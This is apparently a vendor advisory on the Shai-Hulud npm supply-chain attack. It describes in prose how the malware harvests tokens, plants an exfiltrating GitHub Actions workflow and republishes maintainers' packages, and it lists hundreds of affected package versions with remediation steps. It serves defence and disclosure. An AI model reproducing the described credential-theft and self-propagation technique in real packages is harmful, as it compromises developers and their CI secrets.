Shai-Hulud – npm’s Latest Supply Chain Breach: @ctrl/tinycolor and 526+ Packages, including CrowdStrike. What Actually Happened and How to Recover with ASPM?

NPM CTRL Tinycolor Supply chain ASPM Attack SBOM

TL;DR for engineering teams

  • Another supply chain and npm maintainer were compromised after the QIX compromise.
  • The campaign, named Shai-Hulud, continues to target TinyColor and now CrowdStrike npm packages.
  • Another account, following the pattern campaign on npm, has been compromised. 
  • The malware is identical to the tinycolor malware, which includes a bundle.js script that:
    • Downloads and executes TruffleHog, a legitimate secret scanner
    • Searches host systems for tokens and cloud credentials
    • Validates discovered developer and CI credentials
    • Creates unauthorized GitHub Actions workflows within repositories
    • Exfiltrates sensitive data to a hardcoded webhook endpoint

  • Do not install @ctrl/tinycolor@4.1.1 or @4.1.2 (and avoid any dependency graph that resolves to them). The same campaign hit 40-74+ other packages (full list below).
  • The malware uses a self-propagating function (NpmModule.updatePackage) to grab maintainer packages, inject a Webpack-bundled bundle.js, repack, and republish—creating a blast radius across maintainers and dependents.
  • The payload pulls down TruffleHog, hunts for GITHUB_TOKEN, NPM_TOKEN, AWS/GCP/Azure credentials, validates tokens (npm whoami), hits GitHub APIs, writes a persistence GitHub Actions workflow that exfiltrates secrets to webhook[.]site, and can persist in CI even after the original host is clean. IoCs and exfil link below.
  • Initial alert attribution includes Daniel dos Santos Pereira and community triage; Socket and StepSecurity published detailed breakdowns and IoCs.
  • Rotate tokens, rip out the backdoor workflow, scan repos/org for Shai-Hulud branch and workflow, audit your clouds’ secret access, and lock down publish paths. Guidance and commands included.
  • Thanks to Daniel Pereira for the initial alert:

Update 19 September

  • New Indicator of Compromise 23 New libraries affected, bringing the total to 526 libraries,
  • Script updated to include detection

Update 18 September

  • New Indicator of Compromise 27 New libraries affected, bringing the total to 504 libraries,
  • Script updated, plus integration with Phoenix

Update 17 September

  • The number of libraries affected has increased from 40-74 to 477+

What was compromised, and how it spread

This was not a one-off malicious post-install. It’s a small supply-chain engine:

  1. Trojanization pipeline
    The attacker’s code downloads a package tarball, modifies package.json, injects a local bundle.js, repacks, and republishes. That updatePackage function automates the spread across a maintainer’s other packages, weaponizing maintainer trust at scale.
  2. Execution vector
    The minified bundle.js (≈3.6MB) runs during install. It fingerprints the OS, pulls a matching TruffleHog binary, and starts secret harvesting. The code validates npm auth via /-/whoami, calls GitHub REST if a token is present, and probes cloud metadata endpoints used by build agents.
  3. Persistence and exfiltration
    If GitHub access is available, the script writes a workflow at .github/workflows/shai-hulud-workflow.yml. That workflow serializes secrets and posts to a webhook[.]site endpoint. Once committed, secrets can leak from future CI runs even if the developer’s laptop is clean. IoC hash and exfil URL are fixed.
  4. Scope and blast radius
    @ctrl/tinycolor counted ~2M weekly downloads and is just one node in the set. The same campaign hit multiple maintainers and org scopes, including CrowdStrike-scoped packages and a swath of @ctrl/* modules. 

How to verify packages:

Launch our quick check tool:

python3 npm_compromise_detector.py ‘/path/to/your/project’ –output security-audit.txt –check-cache –full-tree –show-locations

How to Check if You Are Affected by Shaia Hulud and verify in Phoenix Security:

If you are a Phoenix Security client, verify your SBOM dependencies from 3rd party of from Phoenix Security Scanner:

How to remediate / Prevention measures against Shaia Hulud NPM campaigns and follow-up

Attack surface is expanding, and developers distributed across an organization is the worst recipe for NPM attacks like this. Following a list of steps to consider to prevent this attack from spreading

Key suggestions

  • Pin Dependencies. Avoid auto update, pin dependencies
  • Prevent direct access/ update from NPM or other package managers (see below) 
  • Prevent unvetted updates using a proxy

To respond and be prepared to Shaia Hulud and other NPM source package attacks, follow the quick recommendation. For detailed guidelines, check npm-shai-hulud-supply-chain-compromise-explained

To defend against npm supply chain attacks and recover fast when incidents strike, adopt these practices:

  • Lock & Pin Dependencies – Use package-lock.json/pnpm-lock.yaml with npm ci (not npm install) and set save-exact=true in .npmrc.
  • Proxy & Sanitize – Route all installs through an internal package manager proxy (e.g., Nexus/Artifactory) that caches and sanitizes approved versions.
  • Restrict Registry Access – Temporarily block direct access to npm when an active campaign is underway, forcing developers to pull only vetted packages.
  • Detect & Monitor – Integrate SCA + malware scanning in CI/CD to catch compromised dependencies early, with reachability analysis to reduce noise.
  • Delay Adoption – Apply a “cooldown period” (e.g., 60 days for new packages) before trusting fresh releases.
  • Reduce Bloat – Eliminate unused or duplicate libraries, and leverage reachability analysis to prune non-critical dependencies.
  • Recovery Playbook: Responding to a Compromise
    • Isolate & Identify: Freeze deployments and check lockfiles against compromised versions.
    • Eradicate & Clean: Remove malicious packages, update to safe versions, purge caches, and commit fresh lockfiles.
    • Rotate All Credentials: Reset every token and secret used in CI/CD (GitHub, npm, cloud keys).
    • Audit for Persistence: Hunt for backdoors (e.g., malicious workflows) and remove them before resuming operations.

Packages confirmed in this campaign

Shaia Hulud attack Waves, NPM, Supply chain

Do not install @ctrl/tinycolor@4.1.1+ (or any resolver path that selects those versions) until you’ve verified provenance. The maintainer account scttcper is the publisher for many of the affected @ctrl/* and Angular packages; treat any recent publishes with extreme caution while provenance is established.  

Refer to the full analysis of Shaia Hulud for full analysis and details on the waves.

Full PathRootLibraryVersionNEW FINDING
@ahmedhfarag/ngx-perfect-scrollbar@20.0.20@ahmedhfaragngx-perfect-scrollbar20.0.20PREVIOUS REPORT
@ahmedhfarag/ngx-virtual-scroller@4.0.4@ahmedhfaragngx-virtual-scroller4.0.4PREVIOUS REPORT
@art-ws/common@2.0.28@art-wscommon2.0.28PREVIOUS REPORT
@art-ws/config-eslint@2.0.4@art-wsconfig-eslint2.0.4PREVIOUS REPORT
@art-ws/config-eslint@2.0.5@art-wsconfig-eslint2.0.5PREVIOUS REPORT
@art-ws/config-ts@2.0.7@art-wsconfig-ts2.0.7PREVIOUS REPORT
@art-ws/config-ts@2.0.8@art-wsconfig-ts2.0.8PREVIOUS REPORT
@art-ws/db-context@2.0.24@art-wsdb-context2.0.24PREVIOUS REPORT
@art-ws/di-node@2.0.13@art-wsdi-node2.0.13PREVIOUS REPORT
@art-ws/di@2.0.28@art-wsdi2.0.28PREVIOUS REPORT
@art-ws/di@2.0.32@art-wsdi2.0.32PREVIOUS REPORT
@art-ws/eslint@1.0.5@art-wseslint1.0.5PREVIOUS REPORT
@art-ws/eslint@1.0.6@art-wseslint1.0.6PREVIOUS REPORT
@art-ws/fastify-http-server@2.0.24@art-wsfastify-http-server2.0.24PREVIOUS REPORT
@art-ws/fastify-http-server@2.0.27@art-wsfastify-http-server2.0.27PREVIOUS REPORT
@art-ws/http-server@2.0.21@art-wshttp-server2.0.21PREVIOUS REPORT
@art-ws/http-server@2.0.25@art-wshttp-server2.0.25PREVIOUS REPORT
@art-ws/openapi@0.1.12@art-wsopenapi0.1.12PREVIOUS REPORT
@art-ws/openapi@0.1.9@art-wsopenapi0.1.9PREVIOUS REPORT
@art-ws/package-base@1.0.5@art-wspackage-base1.0.5PREVIOUS REPORT
@art-ws/package-base@1.0.6@art-wspackage-base1.0.6PREVIOUS REPORT
@art-ws/prettier@1.0.5@art-wsprettier1.0.5PREVIOUS REPORT
@art-ws/prettier@1.0.6@art-wsprettier1.0.6PREVIOUS REPORT
@art-ws/slf@2.0.15@art-wsslf2.0.15PREVIOUS REPORT
@art-ws/slf@2.0.22@art-wsslf2.0.22PREVIOUS REPORT
@art-ws/ssl-info@1.0.10@art-wsssl-info1.0.10PREVIOUS REPORT
@art-ws/ssl-info@1.0.9@art-wsssl-info1.0.9PREVIOUS REPORT
@art-ws/web-app@1.0.3@art-wsweb-app1.0.3PREVIOUS REPORT
@art-ws/web-app@1.0.4@art-wsweb-app1.0.4PREVIOUS REPORT
@crowdstrike/commitlint@8.1.1@crowdstrikecommitlint8.1.1PREVIOUS REPORT
@crowdstrike/commitlint@8.1.2@crowdstrikecommitlint8.1.2PREVIOUS REPORT
@crowdstrike/falcon-shoelace@0.4.1@crowdstrikefalcon-shoelace0.4.1PREVIOUS REPORT
@crowdstrike/falcon-shoelace@0.4.2@crowdstrikefalcon-shoelace0.4.2PREVIOUS REPORT
@crowdstrike/foundry-js@0.19.1@crowdstrikefoundry-js0.19.1PREVIOUS REPORT
@crowdstrike/foundry-js@0.19.2@crowdstrikefoundry-js0.19.2PREVIOUS REPORT
@crowdstrike/glide-core@0.34.2@crowdstrikeglide-core0.34.2PREVIOUS REPORT
@crowdstrike/glide-core@0.34.3@crowdstrikeglide-core0.34.3PREVIOUS REPORT
@crowdstrike/logscale-dashboard@1.205.1@crowdstrikelogscale-dashboard1.205.1PREVIOUS REPORT
@crowdstrike/logscale-dashboard@1.205.2@crowdstrikelogscale-dashboard1.205.2PREVIOUS REPORT
@crowdstrike/logscale-file-editor@1.205.1@crowdstrikelogscale-file-editor1.205.1PREVIOUS REPORT
@crowdstrike/logscale-file-editor@1.205.2@crowdstrikelogscale-file-editor1.205.2PREVIOUS REPORT
@crowdstrike/logscale-parser-edit@1.205.1@crowdstrikelogscale-parser-edit1.205.1PREVIOUS REPORT
@crowdstrike/logscale-parser-edit@1.205.2@crowdstrikelogscale-parser-edit1.205.2PREVIOUS REPORT
@crowdstrike/logscale-search@1.205.1@crowdstrikelogscale-search1.205.1PREVIOUS REPORT
@crowdstrike/logscale-search@1.205.2@crowdstrikelogscale-search1.205.2PREVIOUS REPORT
@crowdstrike/tailwind-toucan-base@5.0.1@crowdstriketailwind-toucan-base5.0.1PREVIOUS REPORT
@crowdstrike/tailwind-toucan-base@5.0.2@crowdstriketailwind-toucan-base5.0.2PREVIOUS REPORT
@ctrl/deluge@7.2.1@ctrldeluge7.2.1PREVIOUS REPORT
@ctrl/deluge@7.2.2@ctrldeluge7.2.2PREVIOUS REPORT
@ctrl/golang-template@1.4.2@ctrlgolang-template1.4.2PREVIOUS REPORT
@ctrl/golang-template@1.4.3@ctrlgolang-template1.4.3PREVIOUS REPORT
@ctrl/magnet-link@4.0.3@ctrlmagnet-link4.0.3PREVIOUS REPORT
@ctrl/magnet-link@4.0.4@ctrlmagnet-link4.0.4PREVIOUS REPORT
@ctrl/ngx-codemirror@7.0.1@ctrlngx-codemirror7.0.1PREVIOUS REPORT
@ctrl/ngx-codemirror@7.0.2@ctrlngx-codemirror7.0.2PREVIOUS REPORT
@ctrl/ngx-csv@6.0.1@ctrlngx-csv6.0.1PREVIOUS REPORT
@ctrl/ngx-csv@6.0.2@ctrlngx-csv6.0.2PREVIOUS REPORT
@ctrl/ngx-emoji-mart@9.2.1@ctrlngx-emoji-mart9.2.1PREVIOUS REPORT
@ctrl/ngx-emoji-mart@9.2.2@ctrlngx-emoji-mart9.2.2PREVIOUS REPORT
@ctrl/ngx-rightclick@4.0.1@ctrlngx-rightclick4.0.1PREVIOUS REPORT
@ctrl/ngx-rightclick@4.0.2@ctrlngx-rightclick4.0.2PREVIOUS REPORT
@ctrl/qbittorrent@9.7.1@ctrlqbittorrent9.7.1PREVIOUS REPORT
@ctrl/qbittorrent@9.7.2@ctrlqbittorrent9.7.2PREVIOUS REPORT
@ctrl/react-adsense@2.0.1@ctrlreact-adsense2.0.1PREVIOUS REPORT
@ctrl/react-adsense@2.0.2@ctrlreact-adsense2.0.2PREVIOUS REPORT
@ctrl/shared-torrent@6.3.1@ctrlshared-torrent6.3.1PREVIOUS REPORT
@ctrl/shared-torrent@6.3.2@ctrlshared-torrent6.3.2PREVIOUS REPORT
@ctrl/tinycolor@4.1.1@ctrltinycolor4.1.1PREVIOUS REPORT
@ctrl/tinycolor@4.1.2@ctrltinycolor4.1.2PREVIOUS REPORT
@ctrl/torrent-file@4.1.1@ctrltorrent-file4.1.1PREVIOUS REPORT
@ctrl/torrent-file@4.1.2@ctrltorrent-file4.1.2PREVIOUS REPORT
@ctrl/transmission@7.3.1@ctrltransmission7.3.1PREVIOUS REPORT
@ctrl/ts-base32@4.0.1@ctrlts-base324.0.1PREVIOUS REPORT
@ctrl/ts-base32@4.0.2@ctrlts-base324.0.2PREVIOUS REPORT
@hestjs/core@0.2.1@hestjscore0.2.1PREVIOUS REPORT
@hestjs/cqrs@0.1.6@hestjscqrs0.1.6PREVIOUS REPORT
@hestjs/demo@0.1.2@hestjsdemo0.1.2PREVIOUS REPORT
@hestjs/eslint-config@0.1.2@hestjseslint-config0.1.2PREVIOUS REPORT
@hestjs/logger@0.1.6@hestjslogger0.1.6PREVIOUS REPORT
@hestjs/scalar@0.1.7@hestjsscalar0.1.7PREVIOUS REPORT
@hestjs/validation@0.1.6@hestjsvalidation0.1.6PREVIOUS REPORT
@nativescript-community/arraybuffers@1.1.6@nativescript-communityarraybuffers1.1.6PREVIOUS REPORT
@nativescript-community/arraybuffers@1.1.7@nativescript-communityarraybuffers1.1.7PREVIOUS REPORT
@nativescript-community/arraybuffers@1.1.8@nativescript-communityarraybuffers1.1.8PREVIOUS REPORT
@nativescript-community/gesturehandler@2.0.35@nativescript-communitygesturehandler2.0.35PREVIOUS REPORT
@nativescript-community/perms@3.0.5@nativescript-communityperms3.0.5PREVIOUS REPORT
@nativescript-community/perms@3.0.6@nativescript-communityperms3.0.6PREVIOUS REPORT
@nativescript-community/perms@3.0.7@nativescript-communityperms3.0.7PREVIOUS REPORT
@nativescript-community/perms@3.0.8@nativescript-communityperms3.0.8PREVIOUS REPORT
@nativescript-community/perms@3.0.9@nativescript-communityperms3.0.9NEW FINDING
@nativescript-community/sentry@4.6.43@nativescript-communitysentry4.6.43PREVIOUS REPORT
@nativescript-community/sqlite@3.5.2@nativescript-communitysqlite3.5.2PREVIOUS REPORT
@nativescript-community/sqlite@3.5.3@nativescript-communitysqlite3.5.3PREVIOUS REPORT
@nativescript-community/sqlite@3.5.4@nativescript-communitysqlite3.5.4PREVIOUS REPORT
@nativescript-community/sqlite@3.5.5@nativescript-communitysqlite3.5.5PREVIOUS REPORT
@nativescript-community/text@1.6.10@nativescript-communitytext1.6.10PREVIOUS REPORT
@nativescript-community/text@1.6.11@nativescript-communitytext1.6.11PREVIOUS REPORT
@nativescript-community/text@1.6.12@nativescript-communitytext1.6.12PREVIOUS REPORT
@nativescript-community/text@1.6.13@nativescript-communitytext1.6.13PREVIOUS REPORT
@nativescript-community/text@1.6.9@nativescript-communitytext1.6.9PREVIOUS REPORT
@nativescript-community/typeorm@0.2.30@nativescript-communitytypeorm0.2.30PREVIOUS REPORT
@nativescript-community/typeorm@0.2.31@nativescript-communitytypeorm0.2.31PREVIOUS REPORT
@nativescript-community/typeorm@0.2.32@nativescript-communitytypeorm0.2.32PREVIOUS REPORT
@nativescript-community/typeorm@0.2.33@nativescript-communitytypeorm0.2.33PREVIOUS REPORT
@nativescript-community/ui-collectionview@6.0.6@nativescript-communityui-collectionview6.0.6PREVIOUS REPORT
@nativescript-community/ui-document-picker@1.1.27@nativescript-communityui-document-picker1.1.27PREVIOUS REPORT
@nativescript-community/ui-document-picker@1.1.28@nativescript-communityui-document-picker1.1.28PREVIOUS REPORT
@nativescript-community/ui-drawer@0.1.30@nativescript-communityui-drawer0.1.30PREVIOUS REPORT
@nativescript-community/ui-image@4.5.6@nativescript-communityui-image4.5.6PREVIOUS REPORT
@nativescript-community/ui-label@1.3.35@nativescript-communityui-label1.3.35PREVIOUS REPORT
@nativescript-community/ui-label@1.3.36@nativescript-communityui-label1.3.36PREVIOUS REPORT
@nativescript-community/ui-label@1.3.37@nativescript-communityui-label1.3.37PREVIOUS REPORT
@nativescript-community/ui-material-bottom-navigation@7.2.72@nativescript-communityui-material-bottom-navigation7.2.72PREVIOUS REPORT
@nativescript-community/ui-material-bottom-navigation@7.2.73@nativescript-communityui-material-bottom-navigation7.2.73PREVIOUS REPORT
@nativescript-community/ui-material-bottom-navigation@7.2.74@nativescript-communityui-material-bottom-navigation7.2.74PREVIOUS REPORT
@nativescript-community/ui-material-bottom-navigation@7.2.75@nativescript-communityui-material-bottom-navigation7.2.75PREVIOUS REPORT
@nativescript-community/ui-material-bottomsheet@7.2.72@nativescript-communityui-material-bottomsheet7.2.72PREVIOUS REPORT
@nativescript-community/ui-material-core-tabs@7.2.72@nativescript-communityui-material-core-tabs7.2.72PREVIOUS REPORT
@nativescript-community/ui-material-core-tabs@7.2.73@nativescript-communityui-material-core-tabs7.2.73PREVIOUS REPORT
@nativescript-community/ui-material-core-tabs@7.2.74@nativescript-communityui-material-core-tabs7.2.74PREVIOUS REPORT
@nativescript-community/ui-material-core-tabs@7.2.75@nativescript-communityui-material-core-tabs7.2.75PREVIOUS REPORT
@nativescript-community/ui-material-core-tabs@7.2.76@nativescript-communityui-material-core-tabs7.2.76PREVIOUS REPORT
@nativescript-community/ui-material-core@7.2.72@nativescript-communityui-material-core7.2.72PREVIOUS REPORT
@nativescript-community/ui-material-core@7.2.73@nativescript-communityui-material-core7.2.73PREVIOUS REPORT
@nativescript-community/ui-material-core@7.2.74@nativescript-communityui-material-core7.2.74PREVIOUS REPORT
@nativescript-community/ui-material-core@7.2.75@nativescript-communityui-material-core7.2.75PREVIOUS REPORT
@nativescript-community/ui-material-core@7.2.76@nativescript-communityui-material-core7.2.76PREVIOUS REPORT
@nativescript-community/ui-material-ripple@7.2.72@nativescript-communityui-material-ripple7.2.72PREVIOUS REPORT
@nativescript-community/ui-material-ripple@7.2.73@nativescript-communityui-material-ripple7.2.73PREVIOUS REPORT
@nativescript-community/ui-material-ripple@7.2.74@nativescript-communityui-material-ripple7.2.74PREVIOUS REPORT
@nativescript-community/ui-material-ripple@7.2.75@nativescript-communityui-material-ripple7.2.75PREVIOUS REPORT
@nativescript-community/ui-material-tabs@7.2.72@nativescript-communityui-material-tabs7.2.72PREVIOUS REPORT
@nativescript-community/ui-material-tabs@7.2.73@nativescript-communityui-material-tabs7.2.73PREVIOUS REPORT
@nativescript-community/ui-material-tabs@7.2.74@nativescript-communityui-material-tabs7.2.74PREVIOUS REPORT
@nativescript-community/ui-material-tabs@7.2.75@nativescript-communityui-material-tabs7.2.75PREVIOUS REPORT
@nativescript-community/ui-pager@14.1.36@nativescript-communityui-pager14.1.36PREVIOUS REPORT
@nativescript-community/ui-pager@14.1.37@nativescript-communityui-pager14.1.37PREVIOUS REPORT
@nativescript-community/ui-pager@14.1.38@nativescript-communityui-pager14.1.38PREVIOUS REPORT
@nativescript-community/ui-pulltorefresh@2.5.4@nativescript-communityui-pulltorefresh2.5.4PREVIOUS REPORT
@nativescript-community/ui-pulltorefresh@2.5.5@nativescript-communityui-pulltorefresh2.5.5PREVIOUS REPORT
@nativescript-community/ui-pulltorefresh@2.5.6@nativescript-communityui-pulltorefresh2.5.6PREVIOUS REPORT
@nativescript-community/ui-pulltorefresh@2.5.7@nativescript-communityui-pulltorefresh2.5.7PREVIOUS REPORT
@nexe/config-manager@0.1.1@nexeconfig-manager0.1.1PREVIOUS REPORT
@nexe/eslint-config@0.1.1@nexeeslint-config0.1.1PREVIOUS REPORT
@nexe/logger@0.1.3@nexelogger0.1.3PREVIOUS REPORT
@nstudio/angular@20.0.4@nstudioangular20.0.4PREVIOUS REPORT
@nstudio/angular@20.0.5@nstudioangular20.0.5PREVIOUS REPORT
@nstudio/angular@20.0.6@nstudioangular20.0.6PREVIOUS REPORT
@nstudio/focus@20.0.4@nstudiofocus20.0.4PREVIOUS REPORT
@nstudio/focus@20.0.5@nstudiofocus20.0.5PREVIOUS REPORT
@nstudio/focus@20.0.6@nstudiofocus20.0.6PREVIOUS REPORT
@nstudio/nativescript-checkbox@2.0.6@nstudionativescript-checkbox2.0.6PREVIOUS REPORT
@nstudio/nativescript-checkbox@2.0.7@nstudionativescript-checkbox2.0.7PREVIOUS REPORT
@nstudio/nativescript-checkbox@2.0.8@nstudionativescript-checkbox2.0.8PREVIOUS REPORT
@nstudio/nativescript-checkbox@2.0.9@nstudionativescript-checkbox2.0.9PREVIOUS REPORT
@nstudio/nativescript-loading-indicator@5.0.1@nstudionativescript-loading-indicator5.0.1PREVIOUS REPORT
@nstudio/nativescript-loading-indicator@5.0.2@nstudionativescript-loading-indicator5.0.2PREVIOUS REPORT
@nstudio/nativescript-loading-indicator@5.0.3@nstudionativescript-loading-indicator5.0.3PREVIOUS REPORT
@nstudio/nativescript-loading-indicator@5.0.4@nstudionativescript-loading-indicator5.0.4PREVIOUS REPORT
@nstudio/ui-collectionview@5.1.11@nstudioui-collectionview5.1.11PREVIOUS REPORT
@nstudio/ui-collectionview@5.1.12@nstudioui-collectionview5.1.12PREVIOUS REPORT
@nstudio/ui-collectionview@5.1.13@nstudioui-collectionview5.1.13PREVIOUS REPORT
@nstudio/ui-collectionview@5.1.14@nstudioui-collectionview5.1.14PREVIOUS REPORT
@nstudio/web-angular@20.0.4@nstudioweb-angular20.0.4PREVIOUS REPORT
@nstudio/web@20.0.4@nstudioweb20.0.4PREVIOUS REPORT
@nstudio/xplat-utils@20.0.5@nstudioxplat-utils20.0.5PREVIOUS REPORT
@nstudio/xplat-utils@20.0.6@nstudioxplat-utils20.0.6PREVIOUS REPORT
@nstudio/xplat-utils@20.0.7@nstudioxplat-utils20.0.7PREVIOUS REPORT
@nstudio/xplat@20.0.5@nstudioxplat20.0.5PREVIOUS REPORT
@nstudio/xplat@20.0.6@nstudioxplat20.0.6PREVIOUS REPORT
@nstudio/xplat@20.0.7@nstudioxplat20.0.7PREVIOUS REPORT
@operato/board@9.0.35@operatoboard9.0.35PREVIOUS REPORT
@operato/board@9.0.36@operatoboard9.0.36PREVIOUS REPORT
@operato/board@9.0.37@operatoboard9.0.37PREVIOUS REPORT
@operato/board@9.0.38@operatoboard9.0.38PREVIOUS REPORT
@operato/board@9.0.39@operatoboard9.0.39PREVIOUS REPORT
@operato/board@9.0.40@operatoboard9.0.40PREVIOUS REPORT
@operato/board@9.0.41@operatoboard9.0.41PREVIOUS REPORT
@operato/board@9.0.42@operatoboard9.0.42PREVIOUS REPORT
@operato/board@9.0.43@operatoboard9.0.43PREVIOUS REPORT
@operato/board@9.0.44@operatoboard9.0.44PREVIOUS REPORT
@operato/board@9.0.45@operatoboard9.0.45PREVIOUS REPORT
@operato/board@9.0.46@operatoboard9.0.46PREVIOUS REPORT
@operato/board@9.0.47@operatoboard9.0.47PREVIOUS REPORT
@operato/board@9.0.48@operatoboard9.0.48PREVIOUS REPORT
@operato/board@9.0.49@operatoboard9.0.49PREVIOUS REPORT
@operato/board@9.0.50@operatoboard9.0.50PREVIOUS REPORT
@operato/board@9.0.51@operatoboard9.0.51PREVIOUS REPORT
@operato/data-grist@9.0.29@operatodata-grist9.0.29PREVIOUS REPORT
@operato/data-grist@9.0.35@operatodata-grist9.0.35PREVIOUS REPORT
@operato/data-grist@9.0.36@operatodata-grist9.0.36PREVIOUS REPORT
@operato/data-grist@9.0.37@operatodata-grist9.0.37PREVIOUS REPORT
@operato/graphql@9.0.22@operatographql9.0.22PREVIOUS REPORT
@operato/graphql@9.0.35@operatographql9.0.35PREVIOUS REPORT
@operato/graphql@9.0.36@operatographql9.0.36PREVIOUS REPORT
@operato/graphql@9.0.37@operatographql9.0.37PREVIOUS REPORT
@operato/graphql@9.0.38@operatographql9.0.38PREVIOUS REPORT
@operato/graphql@9.0.39@operatographql9.0.39PREVIOUS REPORT
@operato/graphql@9.0.40@operatographql9.0.40PREVIOUS REPORT
@operato/graphql@9.0.41@operatographql9.0.41PREVIOUS REPORT
@operato/graphql@9.0.42@operatographql9.0.42PREVIOUS REPORT
@operato/graphql@9.0.43@operatographql9.0.43PREVIOUS REPORT
@operato/graphql@9.0.44@operatographql9.0.44PREVIOUS REPORT
@operato/graphql@9.0.45@operatographql9.0.45PREVIOUS REPORT
@operato/graphql@9.0.46@operatographql9.0.46PREVIOUS REPORT
@operato/graphql@9.0.47@operatographql9.0.47NEW FINDING
@operato/graphql@9.0.48@operatographql9.0.48NEW FINDING
@operato/graphql@9.0.49@operatographql9.0.49NEW FINDING
@operato/graphql@9.0.50@operatographql9.0.50NEW FINDING
@operato/graphql@9.0.51@operatographql9.0.51NEW FINDING
@operato/headroom@9.0.2@operatoheadroom9.0.2PREVIOUS REPORT
@operato/headroom@9.0.35@operatoheadroom9.0.35PREVIOUS REPORT
@operato/headroom@9.0.36@operatoheadroom9.0.36PREVIOUS REPORT
@operato/headroom@9.0.37@operatoheadroom9.0.37PREVIOUS REPORT
@operato/help@9.0.35@operatohelp9.0.35PREVIOUS REPORT
@operato/help@9.0.36@operatohelp9.0.36PREVIOUS REPORT
@operato/help@9.0.37@operatohelp9.0.37PREVIOUS REPORT
@operato/help@9.0.38@operatohelp9.0.38PREVIOUS REPORT
@operato/help@9.0.39@operatohelp9.0.39PREVIOUS REPORT
@operato/help@9.0.40@operatohelp9.0.40PREVIOUS REPORT
@operato/help@9.0.41@operatohelp9.0.41PREVIOUS REPORT
@operato/help@9.0.42@operatohelp9.0.42PREVIOUS REPORT
@operato/help@9.0.43@operatohelp9.0.43PREVIOUS REPORT
@operato/help@9.0.44@operatohelp9.0.44PREVIOUS REPORT
@operato/help@9.0.45@operatohelp9.0.45PREVIOUS REPORT
@operato/help@9.0.46@operatohelp9.0.46PREVIOUS REPORT
@operato/help@9.0.47@operatohelp9.0.47NEW FINDING
@operato/help@9.0.48@operatohelp9.0.48NEW FINDING
@operato/help@9.0.49@operatohelp9.0.49NEW FINDING
@operato/help@9.0.50@operatohelp9.0.50NEW FINDING
@operato/help@9.0.51@operatohelp9.0.51NEW FINDING
@operato/i18n@9.0.35@operatoi18n9.0.35PREVIOUS REPORT
@operato/i18n@9.0.36@operatoi18n9.0.36PREVIOUS REPORT
@operato/i18n@9.0.37@operatoi18n9.0.37PREVIOUS REPORT
@operato/input@9.0.27@operatoinput9.0.27PREVIOUS REPORT
@operato/input@9.0.35@operatoinput9.0.35PREVIOUS REPORT
@operato/input@9.0.36@operatoinput9.0.36PREVIOUS REPORT
@operato/input@9.0.37@operatoinput9.0.37PREVIOUS REPORT
@operato/input@9.0.38@operatoinput9.0.38PREVIOUS REPORT
@operato/input@9.0.39@operatoinput9.0.39PREVIOUS REPORT
@operato/input@9.0.40@operatoinput9.0.40PREVIOUS REPORT
@operato/input@9.0.41@operatoinput9.0.41PREVIOUS REPORT
@operato/input@9.0.42@operatoinput9.0.42PREVIOUS REPORT
@operato/input@9.0.43@operatoinput9.0.43PREVIOUS REPORT
@operato/input@9.0.44@operatoinput9.0.44PREVIOUS REPORT
@operato/input@9.0.45@operatoinput9.0.45PREVIOUS REPORT
@operato/input@9.0.46@operatoinput9.0.46PREVIOUS REPORT
@operato/input@9.0.47@operatoinput9.0.47PREVIOUS REPORT
@operato/input@9.0.48@operatoinput9.0.48PREVIOUS REPORT
@operato/layout@9.0.35@operatolayout9.0.35PREVIOUS REPORT
@operato/layout@9.0.36@operatolayout9.0.36PREVIOUS REPORT
@operato/layout@9.0.37@operatolayout9.0.37PREVIOUS REPORT
@operato/popup@9.0.22@operatopopup9.0.22PREVIOUS REPORT
@operato/popup@9.0.35@operatopopup9.0.35PREVIOUS REPORT
@operato/popup@9.0.36@operatopopup9.0.36PREVIOUS REPORT
@operato/popup@9.0.37@operatopopup9.0.37PREVIOUS REPORT
@operato/popup@9.0.38@operatopopup9.0.38PREVIOUS REPORT
@operato/popup@9.0.39@operatopopup9.0.39PREVIOUS REPORT
@operato/popup@9.0.40@operatopopup9.0.40PREVIOUS REPORT
@operato/popup@9.0.41@operatopopup9.0.41PREVIOUS REPORT
@operato/popup@9.0.42@operatopopup9.0.42PREVIOUS REPORT
@operato/popup@9.0.43@operatopopup9.0.43PREVIOUS REPORT
@operato/popup@9.0.44@operatopopup9.0.44PREVIOUS REPORT
@operato/popup@9.0.45@operatopopup9.0.45PREVIOUS REPORT
@operato/popup@9.0.46@operatopopup9.0.46PREVIOUS REPORT
@operato/popup@9.0.47@operatopopup9.0.47NEW FINDING
@operato/popup@9.0.48@operatopopup9.0.48NEW FINDING
@operato/popup@9.0.49@operatopopup9.0.49PREVIOUS REPORT
@operato/popup@9.0.50@operatopopup9.0.50NEW FINDING
@operato/popup@9.0.51@operatopopup9.0.51NEW FINDING
@operato/pull-to-refresh@9.0.35@operatopull-to-refresh9.0.35NEW FINDING
@operato/pull-to-refresh@9.0.36@operatopull-to-refresh9.0.36PREVIOUS REPORT
@operato/pull-to-refresh@9.0.37@operatopull-to-refresh9.0.37PREVIOUS REPORT
@operato/pull-to-refresh@9.0.38@operatopull-to-refresh9.0.38PREVIOUS REPORT
@operato/pull-to-refresh@9.0.39@operatopull-to-refresh9.0.39PREVIOUS REPORT
@operato/pull-to-refresh@9.0.40@operatopull-to-refresh9.0.40PREVIOUS REPORT
@operato/pull-to-refresh@9.0.41@operatopull-to-refresh9.0.41PREVIOUS REPORT
@operato/pull-to-refresh@9.0.42@operatopull-to-refresh9.0.42PREVIOUS REPORT
@operato/pull-to-refresh@9.0.43@operatopull-to-refresh9.0.43NEW FINDING
@operato/pull-to-refresh@9.0.44@operatopull-to-refresh9.0.44NEW FINDING
@operato/pull-to-refresh@9.0.45@operatopull-to-refresh9.0.45NEW FINDING
@operato/pull-to-refresh@9.0.46@operatopull-to-refresh9.0.46NEW FINDING
@operato/pull-to-refresh@9.0.47@operatopull-to-refresh9.0.47NEW FINDING
@operato/shell@9.0.22@operatoshell9.0.22PREVIOUS REPORT
@operato/shell@9.0.35@operatoshell9.0.35PREVIOUS REPORT
@operato/shell@9.0.36@operatoshell9.0.36PREVIOUS REPORT
@operato/shell@9.0.37@operatoshell9.0.37PREVIOUS REPORT
@operato/shell@9.0.38@operatoshell9.0.38PREVIOUS REPORT
@operato/shell@9.0.39@operatoshell9.0.39PREVIOUS REPORT
@operato/styles@9.0.2@operatostyles9.0.2PREVIOUS REPORT
@operato/styles@9.0.35@operatostyles9.0.35PREVIOUS REPORT
@operato/styles@9.0.36@operatostyles9.0.36PREVIOUS REPORT
@operato/styles@9.0.37@operatostyles9.0.37PREVIOUS REPORT
@operato/utils@9.0.22@operatoutils9.0.22PREVIOUS REPORT
